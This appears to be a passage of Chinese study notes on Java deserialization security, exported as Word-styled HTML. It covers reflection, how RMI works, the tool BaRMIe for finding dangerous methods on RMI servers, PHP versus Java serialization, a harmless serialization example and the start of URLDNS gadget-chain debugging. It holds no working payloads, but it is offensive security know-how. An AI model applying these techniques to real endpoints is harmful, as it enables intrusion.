style="mso-bookmark:java反序列化笔记;"><span style="font-family:Cambria;">            stjson/parser/ParserConfig.java#L1038。 $ 的作用是查找内部类</span></span></p><p style="margin-top: 9.0pt;margin-bottom: 9.0pt;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: Cambria;font-weight: normal;"><span style="mso-bookmark:java反序列化笔记;"><span style="font-family:Cambria;">            </span></span></p><p style="margin-top: 9.0pt;margin-bottom: 9.0pt;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: Cambria;font-weight: normal;"><span style="mso-bookmark:java反序列化笔记;"><span style="font-family:Cambria;">我们正常执行方法是 [1].method([2], [3], [4]...) ，其实在反射里就是            method.invoke([1], [2], [3], [4]...) 。</span></span></p><p style="margin-top: 9.0pt;margin-bottom: 9.0pt;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: Cambria;font-weight: normal;"><span style="mso-bookmark:java反序列化笔记;"><span style="font-family:Cambria;">            </span></span></p><p style="margin-top: 9.0pt;margin-bottom: 9.0pt;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: Cambria;font-weight: normal;"><span style="mso-bookmark:java反序列化笔记;"><span style="font-family:Cambria;">方法 getConstructor 。和 getMethod 类似， getConstructor 接收的参数是构造函数列表类型，因为构造函数也支持重载，所以必须用参数列表类型才能唯一确定一个构造函数。获取到构造函数后，我们使用 newInstance 来执行</span></span></p><p style="margin-top: 9.0pt;margin-bottom: 9.0pt;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: Cambria;font-weight: normal;"><span style="mso-bookmark:java反序列化笔记;"><span style="font-family:Cambria;">            </span></span></p><p style="margin-top: 9.0pt;margin-bottom: 9.0pt;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: Cambria;font-weight: normal;"><span style="mso-bookmark:java反序列化笔记;"><span style="font-family:Cambria;">另一种执行命令的方式ProcessBuilder</span></span></p><p style="margin-top: 9.0pt;margin-bottom: 9.0pt;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: Cambria;font-weight: normal;"><span style="mso-bookmark:java反序列化笔记;"><span style="font-family:Cambria;">            </span></span></p><p style="margin-top: 9.0pt;margin-bottom: 9.0pt;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: Cambria;font-weight: normal;"><span style="mso-bookmark:java反序列化笔记;"><span style="font-family:Cambria;">对于可变长参数，Java其实在编译的时候会编译成一个数组，也就是说，如下这两种写法在底层是等价            的（也就不能重载）：</span></span></p><p style="mso-style-name: 'Source Code';margin-top: 0.0pt;margin-bottom: 10.0pt;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;word-break: break-all;font-size: 12.0pt;font-family: Cambria;font-weight: normal;"><span style="mso-bookmark:java反序列化笔记;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'KeywordTok';color: #007020;font-weight: bold;font-family: Consolas;">public</span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'DataTypeTok';color: #902000;font-family: Consolas;">void</span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'FunctionTok';color: #06287E;font-family: Consolas;">hello</span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">(</span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'BuiltInTok';color: #008000;font-family: Consolas;">String</span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">[]</span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> names</span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">)</span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">{}</span></span><span style="mso-bookmark:java反序列化笔记;"><span style="font-family:Cambria;">            </span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'KeywordTok';color: #007020;font-weight: bold;font-family: Consolas;">public</span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'DataTypeTok';color: #902000;font-family: Consolas;">void</span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'FunctionTok';color: #06287E;font-family: Consolas;">hello</span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">(</span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'BuiltInTok';color: #008000;font-family: Consolas;">String</span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'KeywordTok';color: #007020;font-weight: bold;font-family: Consolas;">...</span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;">names</span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">)</span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">{}</span></span></p><p style="mso-style-parent: '';margin-top: 0.0pt;margin-bottom: 10.0pt;text-align: left;line-height: normal;font-size: 12.0pt;font-family: Cambria;font-weight: normal;margin-left: 36.0pt;text-indent: -24.0pt;"><span style="font-family:Cambria;">•</span><span style="mso-bookmark:java反序列化笔记;"><span style="font-family:Cambria;">getMethod 系列方法获取的是当前类中所有公共方法，包括从父类继承的方法</span></span></p><p style="mso-style-parent: '';margin-top: 0.0pt;margin-bottom: 10.0pt;text-align: left;line-height: normal;font-size: 12.0pt;font-family: Cambria;font-weight: normal;margin-left: 36.0pt;text-indent: -24.0pt;"><span style="font-family:Cambria;">•</span><span style="mso-bookmark:java反序列化笔记;"><span style="font-family:Cambria;">getDeclaredMethod 系列方法获取的是当前类中“声明”的方法，是实在写在这个类里的，包括私            有的方法，但从父类里继承来的就不包含了</span></span></p><p style="mso-style-parent: '';margin-top: 0.0pt;margin-bottom: 10.0pt;text-align: left;line-height: normal;font-size: 12.0pt;font-family: Cambria;font-weight: normal;margin-left: 36.0pt;text-indent: -24.0pt;"><span style="font-family:Cambria;">•</span><span style="mso-bookmark:java反序列化笔记;"><span style="font-family:Cambria;">setAccessible ，这个是必须的。我们在获取到一个私有方法后，必须用            setAccessible 修改它的作用域，否则仍然不能调用。</span></span></p><p><span style="mso-bookmark:java反序列化笔记;"><span style="font-family:Cambria;">            </span></span></p><p style="margin-top: 9.0pt;margin-bottom: 9.0pt;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: Cambria;font-weight: normal;"><span style="mso-bookmark:java反序列化笔记;"><span style="font-family:Cambria;">⼀个RMI Server分为三部分：</span></span></p><p style="mso-style-parent: '';margin-top: 0.0pt;margin-bottom: 10.0pt;text-align: left;line-height: normal;font-size: 12.0pt;font-family: Cambria;font-weight: normal;margin-left: 36.0pt;text-indent: -24.0pt;"><span style="font-family:Cambria;">1.</span><span style="mso-bookmark:java反序列化笔记;"><span style="font-family:Cambria;">⼀个继承了 java.rmi.Remote 的接⼝，其中定义我们要远程调⽤的函数，⽐如这⾥的 hello()</span></span></p><p style="mso-style-parent: '';margin-top: 0.0pt;margin-bottom: 10.0pt;text-align: left;line-height: normal;font-size: 12.0pt;font-family: Cambria;font-weight: normal;margin-left: 36.0pt;text-indent: -24.0pt;"><span style="font-family:Cambria;">2.</span><span style="mso-bookmark:java反序列化笔记;"><span style="font-family:Cambria;">⼀个实现了此接⼝的类</span></span></p><p style="mso-style-parent: '';margin-top: 0.0pt;margin-bottom: 10.0pt;text-align: left;line-height: normal;font-size: 12.0pt;font-family: Cambria;font-weight: normal;margin-left: 36.0pt;text-indent: -24.0pt;"><span style="font-family:Cambria;">3.</span><span style="mso-bookmark:java反序列化笔记;"><span style="font-family:Cambria;">⼀个主类，⽤来创建Registry，并将上⾯的类实例化后绑定到⼀个地址。这就是我们所谓的Server</span></span></p><p><span style="mso-bookmark:java反序列化笔记;"><span style="font-family:Cambria;">            </span></span></p><p style="margin-top: 9.0pt;margin-bottom: 9.0pt;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: Cambria;font-weight: normal;"><span style="mso-bookmark:java反序列化笔记;"><span style="font-family:Cambria;">⾸先客户端连接Registry，并在其中寻找Name是Hello的对象，这个对应数据            流中的Call消息；然后Registry返回⼀个序列化的数据，这个就是找到的Name=Hello的对象，这个对应            数据流中的ReturnData消息；客户端反序列化该对象，发现该对象是⼀个远程对象，地址            在 192.168.135.142:33769 ，于是再与这个地址建⽴TCP连接；在这个新的连接中，才执⾏真正远程            ⽅法调⽤，也就是 hello() 。</span></span></p><p style="margin-top: 9.0pt;margin-bottom: 9.0pt;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: Cambria;font-weight: normal;"><span style="mso-bookmark:java反序列化笔记;"><span style="font-family:Cambria;">            </span></span></p><p style="margin-top: 9.0pt;margin-bottom: 9.0pt;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: Cambria;font-weight: normal;"><span style="mso-bookmark:java反序列化笔记;"><span style="font-family:Cambria;">RMI Registry就像⼀个⽹关，他⾃⼰是不会执⾏远程⽅法的，但RMI Server可以在上⾯注册⼀个Name            到对象的绑定关系；RMI Client通过Name向RMI Registry查询，得到这个绑定关系，然后再连接RMI            Server；最后，远程⽅法实际上在RMI Server上调⽤</span></span></p><p style="margin-top: 9.0pt;margin-bottom: 9.0pt;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: Cambria;font-weight: normal;"><span style="mso-bookmark:java反序列化笔记;"><span style="font-family:Cambria;">            </span></span></p><p style="margin-top: 9.0pt;margin-bottom: 9.0pt;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: Cambria;font-weight: normal;"><span style="mso-bookmark:java反序列化笔记;"><span style="font-family:Cambria;">Java对远程访问RMI Registry做了限制，只有来源地址是localhost的时候，才能调用rebind、            bind、unbind等方法。</span></span></p><p style="margin-top: 9.0pt;margin-bottom: 9.0pt;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: Cambria;font-weight: normal;"><span style="mso-bookmark:java反序列化笔记;"><span style="font-family:Cambria;">            </span></span></p><p style="margin-top: 9.0pt;margin-bottom: 9.0pt;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: Cambria;font-weight: normal;"><span style="mso-bookmark:java反序列化笔记;"><span style="font-family:Cambria;">只要目标服务器上存在一些危险方法，我们通过RMI就可以对其进行调用，之前曾经有一个工具            </span></span><span style="mso-bookmark:java反序列化笔记;"><span style="font-size:12.0pt;font-family:Cambria;text-underline:none;text-decoration:none;"><a href="https://github.com/NickstaDB/BaRMIe" target="_blank">https://github.com/NickstaDB/BaRMIe</a></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="font-family:Cambria;">，其中一个功能就是进行危险方法的探测。</span></span></p><p style="margin-top: 9.0pt;margin-bottom: 9.0pt;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: Cambria;font-weight: normal;"><span style="mso-bookmark:java反序列化笔记;"><span style="font-family:Cambria;">            </span></span></p><p style="margin-top: 9.0pt;margin-bottom: 9.0pt;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: Cambria;font-weight: normal;"><span style="mso-bookmark:java反序列化笔记;"><span style="font-family:Cambria;">在序列化Java类的时候用到了一个类，叫 ObjectOutputStream 。这个类内部有一个方法            annotateClass ， ObjectOutputStream 的子类有需要向序列化后的数据里放任何内容，都可以重写            这个方法，写入你自己想要写入的数据。然后反序列化时，就可以读取到这个信息并使用。</span></span></p><p style="margin-top: 9.0pt;margin-bottom: 9.0pt;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: Cambria;font-weight: normal;"><span style="mso-bookmark:java反序列化笔记;"><span style="font-family:Cambria;">            </span></span></p><p style="margin-top: 9.0pt;margin-bottom: 9.0pt;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: Cambria;font-weight: normal;"><span style="mso-bookmark:java反序列化笔记;"><span style="font-family:Cambria;">PHP的序列化是开发者不能参与的，开发者调用 serialize 函数后，序列化的数据就已经完成了，你得            到的是一个完整的对象，你并不能在序列化数据流里新增某一个内容，你如果想插入新的内容，只有将            其保存在一个属性中。也就是说PHP的序列化、反序列化是一个纯内部的过程，而其 </span></span><span style="mso-bookmark:java反序列化笔记;"><span style="font-family:Cambria;font-weight:bold;">sleep 、</span></span><span style="mso-bookmark:java反序列化笔记;"><span style="font-family:Cambria;">wakeup 魔术方法的目的就是在序列化、反序列化的前后执行一些操作。其实大部分PHP反序列化漏洞，都并不是由反序列化导致的，只是通过反序列化可以控制对象的属性，进而在后续的代码中进行危险操作</span></span></p><p style="mso-style-name: 'Source Code';margin-top: 0.0pt;margin-bottom: 10.0pt;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;word-break: break-all;font-size: 12.0pt;font-family: Cambria;font-weight: normal;"><span style="mso-bookmark:java反序列化笔记;"><span style="">　Extends可以理解为全盘继承了父类的功能。implements可以理解为为这个类附加一些额外的功能；interface定义一些方法,并没有实现,需要implements来实现才可用。extend可以继承一个接口,但仍是一个接口,也需要implements之后才可用。对于class而言，Extends用于(单)继承一个类（class），而implements用于实现一个接口(interface)。</span></span></p><p style="mso-style-name: 'Source Code';margin-top: 0.0pt;margin-bottom: 10.0pt;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;word-break: break-all;font-size: 12.0pt;font-family: Cambria;font-weight: normal;"><span style="mso-bookmark:java反序列化笔记;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Cambria;">序列化反序列化示例Person类需加main函数来看输出结果</span></span><span style="mso-bookmark:java反序列化笔记;"><span style="font-family:Cambria;">            </span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"><span style="mso-spacerun:yes;">    </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'KeywordTok';color: #007020;font-weight: bold;font-family: Consolas;">public</span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'DataTypeTok';color: #902000;font-family: Consolas;">static</span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'DataTypeTok';color: #902000;font-family: Consolas;">void</span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'FunctionTok';color: #06287E;font-family: Consolas;">main</span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">(</span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'BuiltInTok';color: #008000;font-family: Consolas;">String</span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">[]</span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> args</span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">)</span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'KeywordTok';color: #007020;font-weight: bold;font-family: Consolas;">throws</span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'BuiltInTok';color: #008000;font-family: Consolas;">Exception</span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">{</span></span><span style="mso-bookmark:java反序列化笔记;"><span style="font-family:Cambria;">            </span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"><span style="mso-spacerun:yes;">        </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'BuiltInTok';color: #008000;font-family: Consolas;">ObjectOutputStream</span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> out </span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">=</span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'KeywordTok';color: #007020;font-weight: bold;font-family: Consolas;">new</span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'BuiltInTok';color: #008000;font-family: Consolas;">ObjectOutputStream</span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">(</span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'KeywordTok';color: #007020;font-weight: bold;font-family: Consolas;">new</span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'BuiltInTok';color: #008000;font-family: Consolas;">FileOutputStream</span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">(</span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'StringTok';color: #4070A0;font-family: Consolas;">"test.txt"</span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">));</span></span><span style="mso-bookmark:java反序列化笔记;"><span style="font-family:Cambria;">            </span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"><span style="mso-spacerun:yes;">        </span>Person p </span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">=</span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'KeywordTok';color: #007020;font-weight: bold;font-family: Consolas;">new</span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'FunctionTok';color: #06287E;font-family: Consolas;">Person</span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">(</span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'StringTok';color: #4070A0;font-family: Consolas;">"312"</span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">,</span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'DecValTok';color: #40A070;font-family: Consolas;">3</span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">);</span></span><span style="mso-bookmark:java反序列化笔记;"><span style="font-family:Cambria;">            </span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"><span style="mso-spacerun:yes;">        </span>out</span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">.</span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'FunctionTok';color: #06287E;font-family: Consolas;">writeObject</span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">(</span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;">p</span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">);</span></span><span style="mso-bookmark:java反序列化笔记;"><span style="font-family:Cambria;">            </span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"><span style="mso-spacerun:yes;">        </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'BuiltInTok';color: #008000;font-family: Consolas;">ObjectInputStream</span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> in </span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">=</span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'KeywordTok';color: #007020;font-weight: bold;font-family: Consolas;">new</span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'BuiltInTok';color: #008000;font-family: Consolas;">ObjectInputStream</span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">(</span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'KeywordTok';color: #007020;font-weight: bold;font-family: Consolas;">new</span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'BuiltInTok';color: #008000;font-family: Consolas;">FileInputStream</span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">(</span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'StringTok';color: #4070A0;font-family: Consolas;">"test.txt"</span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">));</span></span><span style="mso-bookmark:java反序列化笔记;"><span style="font-family:Cambria;">            </span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"><span style="mso-spacerun:yes;">        </span>in</span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">.</span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'FunctionTok';color: #06287E;font-family: Consolas;">readObject</span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">();</span></span><span style="mso-bookmark:java反序列化笔记;"><span style="font-family:Cambria;">            </span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"><span style="mso-spacerun:yes;">    </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">}</span></span></p><p><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:urldns;"><span style="font-family:Calibri;">URLDNS</span></span></span></p><p><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:urldns;"><span style="font-family:Cambria;">调试URLDNS过程按p神介绍断点在putvul中第一次计算hash为加载instrument.dll(应该是idea用于debug)</span></span></span></p><p style="margin-top: 9.0pt;margin-bottom: 9.0pt;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: Cambria;font-weight: normal;"><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:urldns;"><span style="font-family:Cambria;">              <shape type="#_x0000_t75" filled="f" style="text-indent:0;left:0;width:420.0pt;height:226.05998pt;"><imagedata title="rId22"></imagedata></shape></span></span></span></p><p style="margin-top: 9.0pt;margin-bottom: 9.0pt;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: Cambria;font-weight: normal;"><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:urldns;"><span style="font-family:Cambria;">可以断点在</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:urldns;"><span style="">ht.put(u, url);</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:urldns;"><span style="font-family:Cambria;">可以看到完整调用链</span></span></span></p><p style="margin-top: 9.0pt;margin-bottom: 9.0pt;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 